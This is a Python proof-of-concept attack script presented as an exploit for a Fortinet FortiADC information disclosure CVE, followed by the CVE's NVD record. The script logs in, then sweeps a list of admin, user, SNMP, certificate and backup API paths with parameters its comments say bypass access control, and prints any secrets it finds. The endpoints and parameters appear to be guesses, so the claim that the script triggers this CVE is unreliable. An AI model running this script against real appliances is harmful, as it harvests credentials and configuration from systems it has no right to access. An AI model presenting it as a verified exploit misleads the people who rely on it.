CVE-2025-59921

# CVE-2025-59921 - Fortinet FortiADC Sensitive Information Disclosure PoC # This PoC demonstrates how an authenticated attacker can exploit the vulnerability # to obtain sensitive information via crafted HTTP/HTTPS requests. import requests import urllib3 import sys # Disable SSL warnings for self-signed certificates (common in FortiADC deployments) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class FortiADCInfoDisclosure: """ PoC for CVE-2025-59921 Fortinet FortiADC Sensitive Information Disclosure Vulnerability """ def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.session.verify = False self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'en-US,en;q=0.9', }) def authenticate(self): """Authenticate to FortiADC management interface""" login_url = f"{self.target_url}/api/login" # Alternative login endpoints login_endpoints = [ "/api/login", "/logincheck", "/api/v1/login", "/cgi-bin/login" ] for endpoint in login_endpoints: try: url = f"{self.target_url}{endpoint}" data = { "username": self.username, "password": self.password } response = self.session.post(url, json=data, timeout=10) if response.status_code == 200 and ('token' in response.text.lower() or 'session' in response.text.lower()): print(f"[+] Successfully authenticated via {endpoint}") return True except Exception as e: continue return False def exploit_info_disclosure(self): """ Exploit CVE-2025-59921 by sending crafted HTTP requests to trigger sensitive information disclosure """ # Endpoints that may leak sensitive information sensitive_endpoints = [ "/api/system/status", "/api/system/config", "/api/user/list", "/api/system/admin", "/api/config/global", "/api/system/dns", "/api/system/ntp", "/api/snmp/community", "/api/certificate/list", "/api/system/backup", "/api/log/config", "/api/system/interface", "/api/router/static", ] disclosed_data = {} for endpoint in sensitive_endpoints: try: url = f"{self.target_url}{endpoint}" # Crafted request with special parameters to bypass access control params = { 'format': 'json', 'full': 'true', 'include': 'all', 'detail': '1' } response = self.session.get(url, params=params, timeout=10) if response.status_code == 200 and len(response.text) > 0: # Check if response contains sensitive data sensitive_keywords = ['password', 'secret', 'key', 'token', 'private', 'credential', 'config', 'admin'] if any(kw in response.text.lower() for kw in sensitive_keywords): print(f"[!] Sensitive data found at: {endpoint}") disclosed_data[endpoint] = response.text[:500] except Exception as e: continue return disclosed_data def run(self): """Main execution method""" print(f"[*] Targeting: {self.target_url}") print(f"[*] CVE-2025-59921 - FortiADC Info Disclosure PoC") if not self.authenticate(): print("[-] Authentication failed. Valid credentials required.") return print("[+] Authentication successful") print("[*] Attempting to exploit CVE-2025-59921...") data = self.exploit_info_disclosure() if data: print(f"[+] Disclosed {len(data)} sensitive endpoints") for endpoint, content in data.items(): print(f"\n--- {endpoint} ---") print(content[:200]) else: print("[-] No sensitive data disclosed or endpoint patterns differ") if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password>") print(f"Example: {sys.argv[0]} https://192.168.1.100 admin password123") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] exploit = FortiADCInfoDisclosure(target, username, password) exploit.run()

{"cve": {"id": "CVE-2025-59921", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:41.200", "lastModified": "2025-10-16T14:47:39.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in Fortinet FortiADC version 7.4.0, version 7.2.3 and below, version 7.1.4 and below, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to obtain sensitive data via crafted HTTP or HTTPs requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "7.1.5", "matchCriteriaId": "5D24E0A5-DCC9-406E-B9C9-DBA37E728A7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.4", "matchCriteriaId": "EEF4EE14-8BCF-425A-9A49-1CF82BD47573"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiadc:7.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "7C624CB5-F745-4781-839A-B397EC97590B"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-23-434", "source": "[email protected]", "tags": ["Broken Link"]}]}}